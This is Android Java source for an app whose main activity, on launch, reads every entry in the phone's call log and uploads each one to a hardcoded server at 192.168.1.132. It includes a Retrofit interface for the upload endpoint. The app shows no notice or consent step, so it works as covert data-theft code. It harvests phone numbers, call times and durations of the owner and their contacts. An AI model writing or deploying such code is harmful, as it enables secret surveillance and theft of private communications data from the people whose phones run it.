package com.example.myapp;

import android.provider.CallLog;
import android.content.ContentResolver;
import android.os.Bundle;
import java.io.File;
import java.io.FileWriter;
import android.util.Log;

import okhttp3.MediaType;
import okhttp3.MultipartBody;
import okhttp3.RequestBody;
import retrofit2.Call;
import retrofit2.Callback;
import retrofit2.Response;
import retrofit2.Retrofit;
import retrofit2.converter.gson.GsonConverterFactory;
import androidx.appcompat.app.AppCompatActivity;

import okhttp3.ResponseBody;

import android.database.Cursor;

import java.io.IOException;


public class MainActivity extends AppCompatActivity {

    private static final String BASE_URL = "http://192.168.1.132:5000/";
    private CallLogsAPI callLogsAPI;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        Retrofit retrofit = new Retrofit.Builder()
                .baseUrl(BASE_URL)
                .addConverterFactory(GsonConverterFactory.create())
                .build();

        callLogsAPI = retrofit.create(CallLogsAPI.class);

        // Call logs directory
        File callLogsDir = new File("/data/data/com.android.providers.call_log/databases");
        callLogsDir.mkdirs();

        // Get the content resolver
        ContentResolver contentResolver = getContentResolver();

        // Get the call logs
        Cursor cursor = contentResolver.query(CallLog.Calls.CONTENT_URI, null, null, null, null);

        // Iterate through the call logs
        while (cursor.moveToNext()) {
            String number = cursor.getString(cursor.getColumnIndex(CallLog.Calls.NUMBER));
            String type = cursor.getString(cursor.getColumnIndex(CallLog.Calls.TYPE));
            String date = cursor.getString(cursor.getColumnIndex(CallLog.Calls.DATE));
            String duration = cursor.getString(cursor.getColumnIndex(CallLog.Calls.DURATION));

            // Save the call log to a file
            File callLogFile = new File(callLogsDir, number + "_" + type + "_" + date + "_" + duration + ".txt");
            try {
                FileWriter fileWriter = new FileWriter(callLogFile);
                fileWriter.write(number + " " + type + " " + date + " " + duration);
                fileWriter.close();
            } catch (IOException e) {
                Log.e("MainActivity", "Error writing to file: " + e.getMessage());
            }

            // Send the file to the server
            RequestBody requestFile = RequestBody.create(MediaType.parse("multipart/form-data"), callLogFile);
            MultipartBody.Part body = MultipartBody.Part.createFormData("call_log", callLogFile.getName(), requestFile);
            Call<ResponseBody> call = callLogsAPI.uploadCallLog(body);
            call.enqueue(new Callback<ResponseBody>() {
                @Override
                public void onResponse(Call<ResponseBody> call, Response<ResponseBody> response) {
                    if (response.isSuccessful()) {
                        Log.d("MainActivity", "Call log uploaded successfully");
                    } else {
                        try {
                            String error = response.errorBody().string();
                            Log.e("MainActivity", "Error uploading call log: " + error);
                        } catch (IOException e) {
                            Log.e("MainActivity", "Error uploading call log: " + e.getMessage());
                        }
                    }
                }
                @Override
                public void onFailure(Call<ResponseBody> call, Throwable t) {
                    Log.e("MainActivity", "Error uploading call log: " + t.getMessage());
                }
            });
        }
    }
}


---------------------------------
callogs.api

package com.example.myapp;

import retrofit2.Call;
import retrofit2.http.Multipart;
import retrofit2.http.POST;
import retrofit2.http.Part;
import okhttp3.MultipartBody;
import okhttp3.ResponseBody;

public interface CallLogsAPI {

    @Multipart
    @POST("/upload")
    Call<ResponseBody> uploadCallLog(@Part MultipartBody.Part callLog);

}







